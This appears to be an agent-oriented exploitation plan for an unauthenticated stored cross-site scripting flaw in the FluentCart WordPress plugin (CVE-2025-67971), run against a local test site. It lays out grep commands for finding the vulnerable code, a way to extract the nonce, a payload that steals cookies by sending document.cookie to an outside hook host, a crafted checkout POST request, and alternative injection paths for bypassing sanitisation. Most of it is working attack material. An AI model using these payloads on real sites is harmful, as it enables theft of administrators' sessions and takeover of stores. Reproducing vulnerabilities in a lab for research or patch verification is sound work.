FluentCart < 1.3.0 - Unauthenticated Stored Cross-Site Scripting

This research plan outlines the technical steps to analyze and exploit CVE-2025-67971, an unauthenticated stored cross-site scripting (XSS) vulnerability in the FluentCart plugin.

1. Vulnerability Summary

FluentCart (versions < 1.3.0) fails to properly sanitize user-supplied input during eCommerce operations (likely cart management or checkout) and subsequently fails to escape this data when rendering it in the WordPress admin dashboard or on frontend pages. This allows an unauthenticated attacker to store a malicious script in the database (e.g., within an order or cart session), which executes when a site administrator views the affected record.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php or the WordPress REST API (/wp-json/fluent-cart/v1/...).
• Action (Inferred): Guest-accessible actions such as fluent_cart_add_to_cart, fluent_cart_update_cart, or fluent_cart_process_checkout.
• Vulnerable Parameter: Input fields associated with customer details (name, address, notes) or cart item metadata (attributes, variations).
• Authentication: Unauthenticated (requires wp_ajax_nopriv_ registration or a REST route with permission_callback returning true).
• Preconditions: The plugin must be active and have at least one product published to allow the cart/checkout flow to initiate.

3. Code Flow (Discovery Phase)

Since source files are not provided, the agent must first identify the vulnerable sink using the following trace logic:

1. Entry Point Identification:

   # Search for unauthenticated AJAX handlers
   grep -rn "wp_ajax_nopriv_" wp-content/plugins/fluent-cart/
   
   # Search for REST API routes
   grep -rn "register_rest_route" wp-content/plugins/fluent-cart/
   

2. Input Handling:
   Search for functions that handle $_POST or WP_REST_Request parameters and save them using update_post_meta, update_option, or direct $wpdb queries without calling sanitize_text_field() or wp_kses().
3. Sink Identification:
   Search for where these stored values are retrieved (e.g., get_post_meta) and echoed. Look for the absence of esc_html() or esc_attr().

   # Potential sinks in admin templates
   grep -rn "echo \$" wp-content/plugins/fluent-cart/ | grep -v "esc_"
   

4. Nonce Acquisition Strategy

If the guest-facing endpoint (e.g., adding to cart) requires a nonce, follow these steps:

1. Identify the Script Localization:
   Search for wp_localize_script in the plugin code to find the global variable containing the nonce.

   grep -rn "wp_localize_script" wp-content/plugins/fluent-cart/
   

   Likely JS Variable: fluentCartVars or fluent_cart_admin (inferred).
2. Trigger Script Loading:
   FluentCart scripts usually load on the "Shop" page or any page containing a FluentCart shortcode (e.g., [fluent_cart_shop] or [fluent_cart_checkout]).
3. Extract via Browser:
   • Create a test page with the relevant shortcode (see section 6).
   • Navigate to the page.
   • Execute: browser_eval("window.fluentCartVars?.nonce") (Replace fluentCartVars and nonce with discovered names).

5. Exploitation Strategy

The goal is to inject a payload into an Order or Cart object that will be viewed by an Admin.

Step-by-Step:

1. Locate Target Parameter: Based on discovery, identify a field saved during checkout (e.g., shipping_address or order_note).
2. Craft Payload:
   payload = "<script>fetch('http://HOOK.bin?c='+document.cookie);alert('XSS');</script>"
3. Send Malicious Request:
   Using the http_request tool, simulate a checkout or cart update:

   {
     "method": "POST",
     "url": "http://localhost:8080/wp-admin/admin-ajax.php",
     "headers": { "Content-Type": "application/x-www-form-urlencoded" },
     "body": "action=fluent_cart_process_checkout&nonce=EXTRACTED_NONCE&billing_first_name=<img src=x onerror=alert(1)>&billing_last_name=Tester&..."
   }
   

4. Trigger Execution:
   Navigate to the FluentCart Order management page as an Administrator:
   URL: /wp-admin/admin.php?page=fluent-cart&view=orders

6. Test Data Setup

Before exploitation, ensure the following:

1. Product Creation: Use WP-CLI to create at least one product so the cart system is functional.

   wp post create --post_type=fc_product --post_title='Test Product' --post_status=publish
   

2. Page Setup: Create a checkout page to facilitate nonce extraction if needed.

   wp post create --post_type=page --post_title='Checkout' --post_status=publish --post_content='[fluent_cart_checkout]'
   

7. Expected Results

• The http_request should return a 200 OK or a success JSON message (e.g., {"success": true}).
• When the browser (as Admin) navigates to the Orders list or specific Order Detail page, a JavaScript alert box should appear, or a network request to the attacker's hook should be visible in the console.

8. Verification Steps

1. Database Check: Verify the payload is stored raw in the database.

   wp db query "SELECT meta_value FROM wp_postmeta WHERE meta_key LIKE '_billing_%' AND meta_value LIKE '%<script>%';"
   

2. DOM Verification: Use browser_navigate to the admin order page and check for the injected tag:

   # After navigating
   browser_eval("document.body.innerHTML.includes('<img src=x onerror=alert(1)>')")
   

9. Alternative Approaches

• REST API Path: If the AJAX endpoint is protected, check for REST routes at /wp-json/fluent-cart/v1/cart/add. These often have different validation logic.
• Cart Item Attributes: If checkout fields are sanitized, attempt to inject into cart item "Custom Attributes" which are often handled as arrays and may bypass simple string sanitizers.
• Variations: Attempt injection via the variation_id or variation description fields if the plugin allows unauthenticated users to query/interact with product variations.